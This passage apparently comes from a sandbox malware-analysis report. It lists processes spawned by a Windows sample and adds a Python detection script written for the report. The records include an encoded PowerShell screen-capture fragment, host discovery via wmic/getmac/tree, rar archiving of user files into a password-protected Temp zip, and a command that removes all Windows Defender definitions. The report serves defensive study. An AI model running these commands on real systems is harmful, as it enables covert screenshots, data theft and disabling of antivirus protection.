AAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:0x7ff613350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:13:44:10
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:13:44:10
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:13:44:10
Start date:23/11/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff6934b0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:13:44:10
Start date:23/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:13:44:12
Start date:23/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff613350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:13:44:12
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:13:44:12
Start date:23/11/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff6934b0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:13:44:13
Start date:23/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:0x7ff613350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:13:44:13
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                                                                    Start time:13:44:13
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline"
                                                                                                                                                                                                                                    Imagebase:0x7ff64a840000
                                                                                                                                                                                                                                    File size:2'759'232 bytes
                                                                                                                                                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:49
                                                                                                                                                                                                                                    Start time:13:44:13
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:getmac
                                                                                                                                                                                                                                    Imagebase:0x7ff637e50000
                                                                                                                                                                                                                                    File size:90'112 bytes
                                                                                                                                                                                                                                    MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:50
                                                                                                                                                                                                                                    Start time:13:44:13
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:51
                                                                                                                                                                                                                                    Start time:13:44:13
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                                                                    Start time:13:44:14
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                                                                                    Imagebase:0x7ff6934b0000
                                                                                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:53
                                                                                                                                                                                                                                    Start time:13:44:14
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES74CA.tmp" "c:\Users\user\AppData\Local\Temp\bcdu5fii\CSC91B7380AF2C2414A909984B12C6688DE.TMP"
                                                                                                                                                                                                                                    Imagebase:0x7ff66c690000
                                                                                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

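The compile chain at Target IDs 48 and 53 (csc.exe driven by a response file under the user's AppData\Local\Temp directory, then cvtres.exe reading from the same bcdu5fii work directory) and the cmd.exe-spawned getmac and tree /A /F runs are the parts of this process list worth turning into detection logic. What follows is an added example, not part of the Joe Sandbox report or of the analysed sample: a small Python parser for the report's own Key:value record layout plus three rules run over it. The record text embedded in it is constructed from the entries above with hashes and most fields dropped; the extra discovery binaries (systeminfo, whoami) and the vbc.exe alias are assumptions that generalise beyond what this report shows.

```python
"""Flag suspicious process records from a sandbox process list.

Added example, not code from the Joe Sandbox report or the sample it analyses.
Rules implemented:
  dotnet_compile_from_temp  csc.exe/vbc.exe compiling out of the user's Temp directory
  csc_cvtres_chain          cvtres.exe touching the same Temp work directory as a compiler
  host_discovery / cmd_spawns_discovery  getmac, tree and similar recon binaries
"""
import re
from typing import Dict, List, Tuple

# Constructed from the report entries above (Target IDs 47-53); hashes and most fields omitted.
SAMPLE_RECORDS = r"""
Target ID:47
Path:C:\Windows\System32\conhost.exe
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Target ID:48
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline"

Target ID:49
Path:C:\Windows\System32\getmac.exe
Commandline:getmac

Target ID:50
Path:C:\Windows\System32\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"

Target ID:52
Path:C:\Windows\System32\tree.com
Commandline:tree /A /F

Target ID:53
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES74CA.tmp" "c:\Users\user\AppData\Local\Temp\bcdu5fii\CSC91B7380AF2C2414A909984B12C6688DE.TMP"

"""

Finding = Tuple[str, str, str]  # (Target ID, image name, rule)

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Captures the per-compilation work directory, e.g. "bcdu5fii" in ...\Temp\bcdu5fii\x.cmdline
WORKDIR_RE = re.compile(r'\\AppData\\Local\\Temp\\([^\\"]+)\\', re.IGNORECASE)
COMPILERS = {"csc.exe", "vbc.exe"}  # vbc.exe is an assumed sibling; only csc.exe appears in the report
DISCOVERY_IMAGES = {"getmac.exe", "tree.com", "systeminfo.exe", "whoami.exe"}  # last two assumed
DISCOVERY_CMD_RE = re.compile(r'/c\s+"?(getmac|tree|systeminfo|whoami)\b', re.IGNORECASE)


def parse_records(text: str) -> List[Dict[str, str]]:
    """Split the report's blank-line-separated 'Key:value' blocks into dicts."""
    records: List[Dict[str, str]] = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec: Dict[str, str] = {}
        for line in block.splitlines():
            if ":" not in line:
                continue
            key, value = line.strip().split(":", 1)  # only the first colon separates key from value
            rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyse(records: List[Dict[str, str]]) -> List[Finding]:
    findings: List[Finding] = []
    compile_dirs: Dict[str, set] = {}  # compiler Target ID -> Temp work directories it used
    for rec in records:
        tid = rec.get("Target ID", "?")
        img = image_name(rec.get("Path", ""))
        cmd = rec.get("Commandline", "")
        if img in COMPILERS and TEMP_DIR_RE.search(cmd):
            findings.append((tid, img, "dotnet_compile_from_temp"))
            compile_dirs[tid] = set(WORKDIR_RE.findall(cmd))
        if img in DISCOVERY_IMAGES:
            findings.append((tid, img, "host_discovery"))
        if img == "cmd.exe" and DISCOVERY_CMD_RE.search(cmd):
            findings.append((tid, img, "cmd_spawns_discovery"))
    # Second pass: cvtres.exe (resource converter csc invokes) reading the same work directory
    for rec in records:
        if image_name(rec.get("Path", "")) != "cvtres.exe":
            continue
        shared = set(WORKDIR_RE.findall(rec.get("Commandline", "")))
        for dirs in compile_dirs.values():
            common = shared & dirs
            if common:
                findings.append((rec.get("Target ID", "?"), "cvtres.exe",
                                 "csc_cvtres_chain:" + ",".join(sorted(common))))
    return findings


def run_sample() -> List[Finding]:
    return analyse(parse_records(SAMPLE_RECORDS))


if __name__ == "__main__":
    for tid, img, rule in run_sample():
        print(f"Target {tid:>3}  {img:<12} {rule}")
```

Running it prints one line per hit; conhost.exe (Target 47) produces none, while csc.exe, getmac.exe, the cmd.exe wrapper, tree.com and cvtres.exe are each flagged, the last one correlated back to csc's bcdu5fii directory. Real telemetry would carry a parent PID, which is the better key for the csc/cvtres chain than a shared path component; the path join is used here only because the report records above expose no parent field.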
Target ID:54
Start time:13:44:15
Start date:23/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff613350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:55
Start time:13:44:15
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:56
Start time:13:44:15
Start date:23/11/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff6934b0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:57
                                                                                                                                                                                                                                    Start time:13:44:15
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:58
                                                                                                                                                                                                                                    Start time:13:44:15
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                                                    Start time:13:44:15
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                                                                                    Imagebase:0x7ff6934b0000
                                                                                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:63
                                                                                                                                                                                                                                    Start time:13:44:24
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:64
                                                                                                                                                                                                                                    Start time:13:44:24
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:65
                                                                                                                                                                                                                                    Start time:13:44:24
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *
                                                                                                                                                                                                                                    Imagebase:0x7ff69a3e0000
                                                                                                                                                                                                                                    File size:630'736 bytes
                                                                                                                                                                                                                                    MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:66
                                                                                                                                                                                                                                    Start time:13:44:26
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:67
                                                                                                                                                                                                                                    Start time:13:44:26
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

Target ID:68
Start time:13:44:26
Start date:23/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic os get Caption
Imagebase:0x7ff65aee0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:69
Start time:13:44:26
Start date:23/11/2024
Path:C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:0x7ff7332e0000
File size:468'120 bytes
MD5 hash:B3676839B2EE96983F9ED735CD044159
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:70
Start time:13:44:27
Start date:23/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:0x7ff613350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:71
Start time:13:44:27
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:72
Start time:13:44:27
Start date:23/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic computersystem get totalphysicalmemory
Imagebase:0x7ff65aee0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:73
Start time:13:44:28
Start date:23/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:0x7ff613350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:74
Start time:13:44:28
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:75
Start time:13:44:28
Start date:23/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic csproduct get uuid
Imagebase:0x7ff65aee0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:76
Start time:13:44:29
Start date:23/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:0x7ff613350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:77
Start time:13:44:29
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:78
Start time:13:44:29
Start date:23/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:79
                                                                                                                                                                                                                                    Start time:13:44:30
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
